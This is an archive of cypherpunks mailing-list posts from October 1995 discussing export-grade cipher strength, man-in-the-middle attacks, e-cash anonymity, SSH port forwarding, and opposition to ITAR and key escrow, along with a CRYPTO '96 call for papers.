requirements, regular audits, physical security, relatively secured
communications lines (when compared to the Internet), strong procedural
controls (most of the time), and other such protections, and they still
get hammered for a few million now and then.

	This is probably enough for now, since the list is probably
getting tired of my posts and I have made the major points.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 24 Oct 95 13:06:01 PDT
To: baldwin@RSA.COM (RobertW.Baldwin) (baldwin)
Subject: Re: 80 bit security from 40 bit exportable products
In-Reply-To: <9509248145.AA814557096@snail.rsa.com>
Message-ID: <199510242006.QAA19382@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


baldwin writes:
> 
>         Long ago vendors should have put encryption into network layer
> products, but for a variety of reasons that effort was delayed or
> discouraged.  One effect of this lack is that almost every layer of
> the network stack is adding its own encryption.  For example, the
> HTTP session layer added S-HTTP and the TCP transport layer added
> SSL.  Soon we will have network layer encryption with IPsec.
>         The vendors for each layer can export a product that uses
> ciphers with 40 bit keys.  A user can then combine multiple
> products to get more than 40 bits worth of security.  For example,
> a web client might fetch an S-HTTP page over an SSL protected link
> via a firewall that supports IPsec tunnels.  That's three 40 bit
> keys protecting the data over the internet link (of course, this
> may not be equivalent to a 120 bit cipher, that depends on the
> details of the cipher systems and independence of the key setups).
> Interesting possibilities.
>                 --Bob Baldwin

Even if you assume complete independence of key setup, if a successful
decryption at each layer can be independently detected and verified
(which seems likely in your example), there're only about 3 * (2 ^ 40)
total operations in the worst case, NOT 2 ^ (3 * 40) operations needed
to expose the plaintext.  This is an effective 41.5 bits, not 120.


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Mon, 23 Oct 95 23:15:27 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: [reformatted] how secure can privasoft be?
In-Reply-To: <9510240512.AA07092@cantina.verity.com>
Message-ID: <199510240608.QAA27721@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello patrick@Verity.COM (Patrick Horgan)
  and cypherpunks@toad.com, jirib@cs.monash.edu.au
  and futplex@pseudonym.com, privsoft@ix.netcom.com

...
> > > (0) PrivaSoft actually uses a key longer than 9 digits, and someone just made

JB (that's me!) wrote:
> > Could it be 9 hex digits = 36 bits?

PH wrote:
> A nine digit number, 999,999,999 can be stored as 0x3b9ac9ff. Note that this is
...

I meant "what if it's mis-reported and actuall goes up to FFF,FFF,FFF?".

> > > The information contents a clear message
> > 
> > This is a strange title (I suspect "of" dropped out), but it might
> > well sum it all up :-)
> 
> Nah, I suggested they reformat into 80 columns and suggested a different title
> for this section, but they went with it.  They wanted it fer sure.  I just don't
> know what it means.

Well, if this is actually what they wanted to say, then the 
interpretation I was alluding to was that the contents of the message
is [sent in the] clear.

...
> > This can at most buy you a constant factor - useful, but not very.
...
> Someone else on this list mentioned that an edge detection algorithm 
...
> It could give you a quick go/no go.

Don't forget that in most cases it'll be obvious that it's the wrong
key - only when it isn't would you submit the thing to a second-level
analyzer to check for edges/characters etc.

...
> > > The cryptographic engine can be customer-furnished and customer integrated, 
...
> > What do they mean by this bit?
...

> They mean that if you don't feel secure with theirs, you could use yours in
> their framework...

What, at the end of a release praising the security of their own thing?

> it's the pluggable encryption that NSA has had such a hard
> time with but seems to be in favor of now.

Alternatively their whole *framework* is bogus so NSA isn't concerned
about what encryption you use in the middle. Just another possibility.


Ah well...

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIyCvSxV6mvvBgf5AQFjkwQA1tr1wqgXDCwf3MWhCVJCmmNWQvyA1fHl
4LR7KXxZyPwcBnPFtD9/+sdgL7opnK8E79AXMzgxNJJhvvggHz5dzFmrM6AjKLoK
CiQcIVuZSZ66pxaS+S5bH5R3ZSO/IrbOkt5l1RYuSlow6UCyEcsjbiWSnfaIzdnY
nhvFhDsgfyM=
=ZXzd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Tue, 24 Oct 95 09:32:07 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <9510241442.AA12411@all.net>
Message-ID: <Pine.SOL.3.91.951024162454.14187B-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Oct 1995, Dr. Frederick B. Cohen wrote:

> [...]
> In the case of the trust being placed in MD5 by Netscape, the assumption
> being made (without adequate support as far as I can tell) is that an
> MD5 checksum cannot be forced, through a chosen plaintext attack, to
> yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
> allow the known plaintext attack that gets the RSA private key used to
> authenticate messages.  As far as I am aware (and I may not be aware of
> everything) there is no reference work to support this assumption.  If
> the assumption is wrong, then the whole SSL can fall to a selected
> plaintext attack launchable (presumably) through those general purpose
> Java aplets we have heard so much about.

The above paragraph is complete crap.


- Andy, speaking only for himself.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Mon, 23 Oct 95 23:33:31 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: Certificate proposal
In-Reply-To: <199510142157.OAA07731@orac.engr.sgi.com>
Message-ID: <199510240632.QAA07541@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello tomw@orac.engr.sgi.com (Tom Weinstein) [tomw@cthulhu.engr.sgi.com]
  and cypherpunks@toad.com

TW writes:
> > In article <199510120147.LAA13833@sweeney.cs.monash.edu.au>,
> > Jiri Baum <jirib@sweeney.cs.monash.edu.au> wrote:
> >> What you are missing is that you should not say
> >> "I want to send my credit card number to Egghead Software"
> >> you should say
> >> "I want to send my credit card number to 12 34 56 78 9A BC DE F0"
> 
> > Why does this sound so much like defining the problem away?

To some extent it is...

> > Maybe I just don't get it...
> 
> I agree.  Sending your cc# to a key or an IP address is not what you
> want to do.  As a consumer, I want to make sure that I send my cc# to
> the merchant I am buying from.

But how do you know that you want to send to Egghead Software in the
first place? EHS could be a MIMT, maybe you really want to talk to
Eggfoot Software, but every e-mail Eggfoot sends out is intercepted
and changed to read "Egghead" (and vice versa)...

By the time you verify that Egghead is who you want, you could have just
as easily verified that the key is who you want. Thus skipping one step
and avoiding all the attacks applicable to that step.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIyIdCxV6mvvBgf5AQHotgQAyEwKWYJR2sgvAyS0eQ45W3TXIaIMeKI2
darQyiz1nW70EY/X8gs3P4+MQnYF/d0QHw6dmyzrXTOYA1UgioEsB8OWy2S65uc5
PqwnVW7TL/e2tgFeuZc/nUvhw7wqgbxAJzhABlnhb6K1BwiEmYFQEqAU8x9Luczm
3cRJeqqKPYM=
=2Pdd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 24 Oct 95 16:50:30 PDT
To: weidai@eskimo.com
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
Message-ID: <199510242349.QAA11382@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 24 Oct 95 13:51:45 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: USA Today Against ITAR & GAK
Message-ID: <199510242051.QAA27794@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm pleased to report that USA Today editorializes today (Tuesday, Oct. 24, 
1995) against both ITAR and GAK. 

They get the chronology of the SSL brute-forcing and PRNG seed prediction
attacks on Netscape Navigator backwards, but they get many other things right
in a fairly short editorial. I am certainly encouraged by this development.
Someone at USA Today definitely got the message that the ITAR are a large
obstacle to net security in the U.S.

Some particularly apropos quotations (from pg. 12A):
 
On ITAR:
	"[After the Netscape hacks] the perception of the Internet as 
	 insecure was indelible. That needn't be. Encryption software 
	 available right now is exponentially more powerful and could 
	 make code breaking virtually impossible. Its use is blocked
	 by government export regulations that make the programs 
	 difficult if not impossible to market, even for domestic 
	 purposes."

On GAK:
	"[...] key escrow [...] may sound reasonable, but apply that 
	 reasoning to more mundane areas of life. What the government
	 is saying is yes, you can put bars on your windows, locks on
	 your doors and put your jewelry in a safe, but you have to
	 give us the keys and the combination because you might be a
	 crook."

That phrasing sounds rather familiar....

	"The [GAK] system -- which the FBI and the Commerce Department
	 declined to defend in an opposing view to this editorial [...]"

Now I find that surprising. Since when does the FBI not even try to justify
Clipper and its descendants in the newspapers ?

For foreign readers, I'll note that USA Today has easily the largest 
national circulation of any daily newspaper in the U.S.

[Letters to the editor can be emailed to usatoday@clark.net; they want you
 to give your snail-mail address and home and work phone numbers so they
 can check your identity.]

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 24 Oct 95 00:10:45 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: subjective names and MITM
In-Reply-To: <199510061708.KAA27047@jobe.shell.portal.com>
Message-ID: <199510240659.QAA07645@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Hal <hfinney@shell.portal.com>
  and cypherpunks@toad.com

hfinney wrote (but didn't sign):
> jbaber@mi.leeds.ac.uk writes (where I have taken the liberty of
> reformatting for 80 columns):
> 
> > Now mail is far easier to fake/intercept than a digital
> > signature/encryption - at least I hope so. Therefore if Hal where to
...
> 
> Well, this is not necessarily the case.  A MITM may be signing my
> messages for me, and then putting them back the way they were before I
> am allowed to see them.  Granted, this would not be easy, and perhaps
...
> futile.  Doesn't this bother you?

The point is that what if there's a MIMT who is changing the signatures
on the hfinney posts? What if originally they were signed "Alice" but
then a MIMT went and substituted "Hal"?

Then any reputation I attached to Hal should really go to Alice, no?
And even when I get a certified key for Hal, I still can't really put
the reputation onto it, since maybe the reputation really belongs to
Alice.

Doesn't this bother you?

At least with digital signatures I can be certain that the same person
always signed the messages (and that ri cannot repuditate them), even
if I don't necessarily know who that person is. (I guess the issue
becomes plagiarism rather than impersonation.)


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIyOySxV6mvvBgf5AQFJUQP/Wf8wHYUw4JbE4PBxWbSX1nzgOA2EYYsn
L2FuBjKuLXqAG+xRSdJe8ySgaqiPV1JWP16NX97x5YOkMH99DMH73DMmYntvmYy1
G6NdXxhejLQgv0vx0VmVCE171ACB4A+uNe3b6EAsbsKTvd3b5TOWDl9KFQ5wtqGf
VK0o3j6S95U=
=QdEN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 24 Oct 95 17:13:22 PDT
To: cypherpunks@toad.com
Subject: Re: What is needed for S/MIME remailer ?
In-Reply-To: <9509248145.AA814556043@snail.rsa.com>
Message-ID: <308D8019.648F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


baldwin , Robert W. Baldwin wrote:
> 
>         The other day I was wondering what it would take to make an
> anonymous remailer for an S/MIME client.  Implementing S/MIME from
> scratch is a lot of work given the lack of a public domain
> implementation, but it seems that a remailer could be built on top
> of a commercial email product that supported S/MIME.  The question
> is: What features should a commercial S/MIME email product have to
> make it easy to support a remailer?  Are there a small set of
> command line options that would greatly simplify a remailer
> implementation?

  S/MIME is mostly PKCS#7.  Eric Young is doing an implementation
of PKCS#7 for his SSLEAY package.  It seems like a good place
to start...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 24 Oct 95 17:24:50 PDT
To: cypherpunks@toad.com
Subject: Re: Does your software?
In-Reply-To: <199510241710.NAA18747@jafar.sware.com>
Message-ID: <308D82CA.7AB2@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> Yet it services more than one request per minute, 24 hours, 7 days, and
> has done so without denial of services, corruption, or leakage since its
> first implementation.  It's so small it can be verified, it's faster
> than the retail brand, and it doesn't have all the holes we keep finding
> in tho other servers.  Different strokes for different folks.

  Is this the server running on port 80 of all.net?  I've tried connecting
to it quite a few times at various times of day and night, using
netscape and telnet, and all I ever get in response to 'GET /'
is a closed connection.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 24 Oct 95 14:15:57 PDT
To: cypherpunks@toad.com
Subject: CRYPTO '96 CFP
Message-ID: <9510242122.AA18209@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


                            CRYPTO '96

         August 18-22, 1996, Santa Barbara, California, USA

                          CALL FOR PAPERS


General Information:

Crypto '96, the Sixteenth Annual Crypto Conference, is organized by the
International Association for Cryptologic Research (IACR), in 
cooperation with the IEEE Computer Society Technical Committee on 
Security and Privacy, and the Computer Science Department of the 
University of California, Santa Barbara.  Original papers are solicited 
on all technical aspects of cryptology.

Instructions for Authors:

Please send a cover letter, one title page and 16 copies of an extended
abstract.  They must be received by the Program Chair at the address 
given below no later than February 14, 1996 (or postmarked by February 
4, 1996 and sent via airmail).

The cover letter must state: "This paper does not substantially 
duplicate work that any of the authors have published elsewhere or have 
submitted in parallel to any other conference or workshop that has 
proceedings."

The title page should contain the title, the names of the authors, their
postal and e-mail addresses and the short abstract; it should be made 
clear who is the author to whom correspondence should be sent.  The 
first page of the extended abstract should be an informal one-page
statement (that will not be published in the Proceedings) describing the 
content of the oral presentation that will be given at Crypto '96 in the 
event the paper is accepted (this statement is expected to be different 
from the short abstract of the paper).  This page and the extended 
abstract must be ANONYMOUS, i.e., they must contain no indication 
whatsoever of the identity of the author(s).  The main body of the 
extended abstract should start with the title, short abstract, and list 
of keywords.  This should be followed by a succinct statement 
appropriate for a non-specialist reader specifying the subject 
addressed, its background, the main achievements, and their significance 
to cryptology.  Technical details directed to the specialist should then 
follow.

Submissions are limited to 10 single-spaced pages of 11pt type, not 
counting the bibliography and clearly marked appendices.  Since referees 
are not required to read the appendices, the paper should be 
intelligible without them.  The paper including bibliography and 
appendices must run to no more than 15 pages.  These limits will be 
strictly enforced.

Unfortunately, because of the burdens on the Program Committee and
the need to keep strictly to the time schedule, we will have to
summarily reject any submission not in keeping with the above
instructions.

Authors are encouraged to make 2-sided copies if possible.  Please send 
submissions by post; unfortunately, we cannot accept submissions by    
e-mail or fax.

Notification of acceptance or rejection will be sent to authors on 
April 22, 1996.

Conference Proceedings:

Proceedings will be available at the meeting.  They will be published in
the Springer-Verlag Lecture Notes in Computer Science.  Clear
instructions about the final copy will be sent to authors of accepted
papers.  The final copies of the accepted papers will be due on June 1,
1996.  Final papers arriving too late will be removed from the main
program.  Authors of accepted papers must guarantee that their paper 
will be presented at the conference.

Stipends:

A limited number of stipends are available to those unable to obtain
funding to attend the conference.  Students whose papers are accepted 
and who will present the paper themselves are encouraged to apply if 
such assistance is needed.  Requests for stipends should be addressed to 
the general chair.

Send submissions to:

Neal Koblitz, Program Chair, Crypto '96
Dept. of Mathematics, Box 354350
University of Washington
Seattle, WA 98195 U.S.A.
Internet: koblitz@math.washington.edu
Phone: 1-206-543-4386

For other information contact:

Richard Graveman, General Chair, Crypto '96
Bellcore
444 Hoes Lane RM 1K-221
Piscataway, NJ 08854 U.S.A.
Internet: rfg@ctt.bellcore.com
Phone: 1-908-699-4611

Program Committee:

Neal Koblitz, Chair (Mathematics, University of Washington, USA)

Mihir Bellare (Computer Science, University of California at San Diego, USA)
Josh Benaloh (Microsoft, USA)
Matt Blaze (AT&T Bell Laboratories, USA)
Johannes Buchmann (Computer Science, Universitaet des Saarlandes, Germany)
Don Coppersmith (IBM Research, USA)
Joan Feigenbaum (AT&T Bell Laboratories, USA)
Andrew Klapper (Computer Science, University of Kentucky, USA)
Lars Knudsen (Computer Science, Ecole Normale Superieure, France)
Peter Landrock (Mathematics, Aarhus University, Denmark)
Tsutomu Matsumoto (Electrical & Computer Engineering, Yokohama National
University, Japan)
Chris Mitchell (Computer Science, University of London, UK)
Paul Van Oorschot (Bell-Northern Research, Canada)
Bart Preneel (Catholic University at Leuven, Belgium)
Rainer Rueppel (R3 Security Engineering, Switzerland)
Jacques Stern (Computer Science, Ecole Normale Superieure, France)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@sophos.com>
Date: Tue, 24 Oct 95 09:41:32 PDT
To: <cypherpunks@toad.com>
Subject: Returned mail: unknown mailer error 2
Message-ID: <199510241644.RAA10532@elbereth.sophos.com>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 24 Oct 1995 17:44:00 +0100
from meriadoc.sophos.com [193.82.145.1]

   ----- The following addresses had delivery problems -----
|/home/ian/.mailscript  (unrecoverable error)
    (expanded from: <ian@elbereth.sophos.com>)

   ----- Transcript of session follows -----
/home/ian/.mailscript: syntax error near unexpected token `|/'
/home/ian/.mailscript: /home/ian/.mailscript: line 1: `|/usr/bin/filter -vo /home/ian/.elm/filterlog'
554 |/home/ian/.mailscript... unknown mailer error 2

   ----- Original message follows -----


From: cypherpunks@toad.com
Date: Tue, 24 Oct 1995 18:05:29 +0100
Apparently-To: ian@virusbtn.com

Hello




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 24 Oct 95 00:52:25 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: How can e-cash, even on-line cleared, protect payee identity?
In-Reply-To: <199510232350.QAA17025@jobe.shell.portal.com>
Message-ID: <199510240749.RAA07855@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Hal <hfinney@shell.portal.com>
  and cypherpunks@toad.com

H wrote:
> "Simon Spero" <ses@tipper.oit.unc.edu>  wrote:

[about fully-anon ecash]
 
...
> There could be an issue of fraud, though,
> where Bob insists that Alice's coin was no good even though it actually
> was.
...

Cut'n'choose between Alice and Bob? Ie Alice asks Bob for half the blinds
to check that the proto-coins are true?

Apart from no-good proto-coins, is there any other way the coin
could be no good?

As for no-good proto-coins, it's Bob's fault, isn't it? Alice has 
a record of what Bob sent, and what she sent back. Anybody can check
that the latter is a bank-signed version of the former. Given this,
there's no need (from this) for Alice to know that the proto-coins are
good (if they aren't, Bob's an idiot, but there's not much Alice
can do about it - I guess given all the blinding factors the bank
could replace the coin, seeing that it signed a worthless one).

So Bob can't really fraud - unless I've missed something.


An interesting question is whether Bob and Nick can now collude to
expose Alice. Therefore Alice would at least want to verify that the
proto-coins are true? Would that suffice? Or is that not necessary?

> Still, I think this scheme has considerable merit and is worth exploring
...

Certainly.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMIyabyxV6mvvBgf5AQESsAP6AqZD+/nJVZxiV5UuPUTPvWNo/vOADAWz
cz65Iw4u9SyqpQfO/sRxZneVCdsDDHi9K+iRFtI+cc5NFCKUVUC2Cop6ExzuCClL
VgR5ILG+ECsw8V+FYHepkch96acgPtVVc3trYExWlr3lY5mYl4ccS9G3Mhn/PyPO
Dq5eP2GEBEA=
=8dxL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 24 Oct 95 15:00:42 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Logic Bomb detailed by IETF
In-Reply-To: <199510240734.AAA23451@jobe.shell.portal.com>
Message-ID: <199510242200.SAA06950@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> I see that Perry is as charming as ever?

And I see that you don't know what you are talking about.

> Perry, I just don't think that it is wise to stick your head in the sand
> and ignore a severe flaw in your algorithm, while actively misrepresenting
> matters to those people who are not intimately familiar with the IETF. 

I wonder if you even know what the IETF is, since you seem to be
waving around an organization I work in like it was a mass of chicken
entrails. 

> Postscript isn't like any other language around.  Operator names have no
> special significance to the interpreter.  You can't just "strip out" 
> dangerous commands.  They aren't "reserved" in the sense that operator
> names are in other languages, like COBOL or BASIC. 
> 
> In Postscript, operator names are simply keys into a LIFO dictionary. 

If, Mr. Anonymous, you can get a postscript interpreter to do I/O
after you have stripped all the system calls that do file I/O out of
the C code for the interpreter merely by invoking the names of the I/O
commands in the postscript books, you have managed a feat beyond mere
spoon bending and ought to be studied by the parapsychologists.

In any case, Netscape doesn't write the postscript interpreters and
doesn't have built in support for postscript and doesn't ship mailcap
files that deal with postscript, so I'd say you are a crank worth ignoring.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 24 Oct 95 16:04:57 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: Hack DigiCash: Payee Anonymity
Message-ID: <199510242333.SAA05678@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ObCrypto: Slim to None, peripheral at best.

At 07:55 PM 10/24/95 +0100, some annoying nym wrote:
>Now all we need is to do is get some specs on how DigiCash's software works
>so that we can code this.  I expect that this method will become quite
>popular.  To withdraw DigiCash, one must come up with $250 to start, sign a
>bunch of forms, etc.  I suspect that most people would rather change money
>in lesser amounts, probably under $50.  This opens up a huge market for
>Blacknet money exchangers.  I would gladly pay Tim's Internet Cash Exchange
>a commission to exchange $50 worth of greenbacks for Digicash instead of
>dealing with Mark Twain and shelling out $250 to start..

Irrelevant point: To open an account as a consumer, not a merchant, and
solely for DigiCash use, only $11 (!) is required.  Although I'll agree
with the bunch of forms part.  Damn, I wish I understood legalese...

Dave
- ----- David E. Smith, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/
Sorry, the full signature is on strike pending DigiCash salary negotiations
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMI1uAgwyfvCScyE5AQHvpAP+MrQ0vflUe6q7uyXa0PHlyMttf50StEdX
eYsXOlN9wLWH9yF6Wkvx8kXQS9sOE7anMYEk42VvwETq3y1EduP3dYAvSW2h7EG2
X4z0wsUT1l3drcq5ieeakA1nwGmHuQdMgPNaPZ8pvIGluTGobKAvta4Ea0MHy8HY
YdvbDA4w0x0=
=69WP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Tue, 24 Oct 95 09:13:40 PDT
To: weidai@eskimo.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951023022123.9641C-100000@eskimo.com>
Message-ID: <199510241625.SAA00777@soikko.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> However, I probably won't give up ETT yet, because there are some design 
> differences that would make ETT more useful in certain circumstances.  
> SSH seems to be design mainly as a secure telnet program, with TCP port 
> redirection added on, which suggests (although I'm not sure) that you 
> need to have an user account on the SSH server to connect to it.  It also 
> does not seem to do any filtering of TCP redirection requests.  Chaining 
> would not work well with SSH because of its packet overhead.

You are quite right here; some kind of account is needed on the
forwarder machine.  (It can, though, be an account without password
and a login shell that just sleeps.)  But anyway, TCP port forwarding
is not its main function.  (I don't think the packetizing is such a
major overhead though - it currently transfers around 400kbytes/sec
over ethernet encrypted with RC4 between P90 machines.)

> authentication schemes.  What are the relative advantages of your protocol
> over a more straight-forward DH + signature of exchange values?  DH would
> provide forward secrecy directly without the need to change the server key
> every hour. 

The reasons for this key exchange are mostly historical.  If I was
starting the implementation now, I would use DH + signatures.  The
performance difference is not very big, but DH + signature would be simpler.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 24 Oct 95 18:10:23 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: BlackNet Meets Stanford Law School
Message-ID: <acb2d750010210042399@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:51 PM 10/24/95, Futplex wrote:

>On GAK:
>        "[...] key escrow [...] may sound reasonable, but apply that
>         reasoning to more mundane areas of life. What the government
>         is saying is yes, you can put bars on your windows, locks on
>         your doors and put your jewelry in a safe, but you have to
>         give us the keys and the combination because you might be a
>         crook."
>
>That phrasing sounds rather familiar....

Hmmmhhh...yes, doesn't it though?

By the way, I gave a talk at Stanford Law School last week, to Professor
Margaret Radin's seminar on "Cyberspace and the Law." They had been reading
a bunch of papers and reprints on Clipper, PGP, and crypto policy,
including pieces by both me and Michael Froomkin (whose long paper is
apparently becoming widely read for crypto-legal discussions).

I was using the "curtain" metaphor for key escrow, describing a situation
where the government might insist people only install curtains that have a
secret invisibility mode, where the curtains become transparent to them
only. It's more than just becoming transparent completely, as with key
escrow one does not know that one's communications have been rendered
readable...unless they eventually tell you, as they are _supposed_ to do
with some classes of wiretaps (but not others, as in foreign intelligence
surveillance).

One of the students came up with a nice extension of this metaphor: using
one's own system inside a key escrow wrapper (also called
"superencryption") is like adding a second set of curtains inside the first
set. An obvious point, but a nice metaphor that makes the point to one and
all: the mandatory key escrow system, if adopted, would mandate the use of
transparent-mode curtains and would ban (or try to) the use of additional
sets of curtains.

(What about internal room dividers which obscure the view into one's house
that the cops want? The crypto parallels to this are interesting.)

By the way, Professor Radin made an interesting comment at the end of the
class. I'm paraphrasing, and any loss of her actual intended meaning may be
my fault, so don't take this as gospel.

She said she had previously thought that the implications of strong crypto
would be "handled normally" within the context of markets and courts, but
that after hearing my description of many issues (*) she now has doubts
that the conventional legal system and conventional market system will be
able to handle normally the implications of strong crypto. (By handle
normally, I took her to mean in the way that several other recent
technological advances have been handled without significant disruptions,
in an evolutionary way.)

(* The issues are the usual suspects: anonymous digital cash, remailers,
information markets, copyrights, markets that benefit from untraceable
communication, the BlackNet experience, the utter unbreakability of
long-enough keys, and so on.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Tue, 24 Oct 95 15:28:27 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: The cost of ITAR
Message-ID: <Pine.SOL.3.91.951024174936.1502A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Here is one for the files. . . . .

On page 49 of WIRED 3.11 is the following tidbit from John Battelle

SUN'S CODEMAKING COMRADES

Here's the problem:  Because the US government has outlawed the export of 
industrial-strength encryption, firms seeking to do business abroad find 
themselves without trustworthy security options once they leave US 
boundaries.  How can companies in the information and networking 
business, such as Sun Microsystems, possibly sell a system to Alcatel in 
France, for example, if the encryption that accompanies it can be broken 
by a 14-year-old with too much time on his or her hands?  They can't.  So 
Sun came up with a novel solution: buy Russian.  The Soviets may have 
sucked at cars and strip malls, but they sure as hell knew their 
cryptography.  "The Russians can make any kind of encryption you want" 
says Geoffrey Baehr chief network officer at Sun.  And what can the US 
government do about a product developed outside its borders?  Nothing.

In fact, Sun was so taken with Russia's computing talent that the company 
recently hired the entire team once responsible for the next generation 
of Soviet supercomputers (and the Russians brought along the plans for 
the beasts).  Ask Sun chief scientist John Gage if he'd rely on 
US-approved encryption to send those plans between Moscow and California, 
and he'll laugh out loud.  "We can't rely on that stuff.  We're talkling 
trade secrets here!" - John Battelle

-------------

This looks like a striking example of regulatory arbitrage at work, and 
if it can be confirmed in its details ought to be an extremely powerful 
anecdote in the hands of those working against GAK and ITAR.

The sucking sound is American jobs heading overseas, 
the snorting sound is American trade-secrets being sniffed up 
    by foriegn competitiors, 
the cackling sound is the laughter of the Four Horseman, who (if they 
    bother) just buy strong crypto from some hard-currency hungry unemployed 
    ex-Soviet programmer.

